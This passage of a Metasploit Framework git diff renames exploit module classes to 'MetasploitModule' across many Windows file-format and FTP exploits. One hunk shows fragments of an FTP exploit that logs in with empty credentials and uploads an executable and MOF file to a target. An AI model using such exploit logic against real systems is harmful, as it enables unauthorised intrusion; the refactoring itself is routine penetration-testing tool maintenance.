b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index f4fb8022de..7f243b7e07 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index 1d79f124e1..b005e87ed9 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb index 476b0ed1ae..189433c05f 100644 --- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index 736e5311c5..1e6c0503bf 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 5f822b0dae..4d12cb0ead 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 2ddbf829a4..2861864028 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index 5c706c6424..2124a0580c 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 8c4f170b83..9517eaab91 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index c6bd57e032..538b44d520 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb index 68cbfde4ef..3ad0c240f7 100644 --- a/modules/exploits/windows/fileformat/videocharge_studio.rb +++ b/modules/exploits/windows/fileformat/videocharge_studio.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index 42b4cb395e..a7670ff4e0 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index 337be73d0c..6c8280bc0a 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 0a35ce8bce..ad4e9a8306 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b9474d67e7..92af418f47 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 0e83aa1d3e..cc8c810bb0 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 4048200658..9efaf4aa67 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index cab592fca2..a2e8842571 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index dac5f66d9a..381d95bef2 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 6169941ed8..a4c85b7258 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index 4589c909f9..d903b448c3 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index af6a94c36b..85a01388d8 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index 0ee6a6a64b..4a9d750ab8 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb index 21385fe87f..451b5cdff1 100644 --- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb +++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index 7727f18446..07a51fe6c6 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 614d173074..c9bc390b9c 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 0c6ee32cda..c30ee3fbb9 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index e6f7b78680..85090b33ae 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index 9e217df2a7..461b7f28bc 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index a70e7da10a..97067e3539 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index d3a93a3cfa..c2d91d9795 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index b2aa38f375..af6d02d283 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 09ec293453..3bcb0cf970 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 88764b31c3..72d911d5a4 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 6ae2f48820..f4e9760d84 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 86675200e1..266e3fc0fa 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index da254de1d6..13a3d851d9 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index c740472f19..7eb93075e6 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 4e71775798..ffff7db5ed 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 0026fb5b96..68622d600e 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index ae905a9acd..207d0f486d 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 2c2707a2c7..e0a1ab643f 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 6223524b5b..1e4f688b9b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index db15f4a362..2ced587670 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 07c9cb90fc..67dce18c44 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 7991c3fe5c..fef06a6196 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index d876af7908..dbbe479d36 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 2757eadf85..763701eddd 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 3352b4407e..1a21d31d2b 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index e73e7c3d6e..31e7f97f65 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -71,12 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) - print_status("#{peer} - Sending empty login...") + print_status("Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ - print_error("#{peer} - Error sending username") + print_error("Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ - print_error("#{peer} - Error sending password") + print_error("Error sending password") return false end - print_good("#{peer} - Empty authentication was successful") + print_good("Empty authentication was successful") # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index d39a39495b..15638bd5ee 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index ff40940d5e..dfd218bd16 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index 68b913acbc..4a3f5c083e 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index f8fc0893db..51f8a6e1bd 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 4f8df2009c..31744286f0 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 91809dba78..1a10e1d0e6 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 754d9afd7e..43328997c2 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 497c2049ad..57bb580aac 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index e90f25e4ba..390c85c097 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ 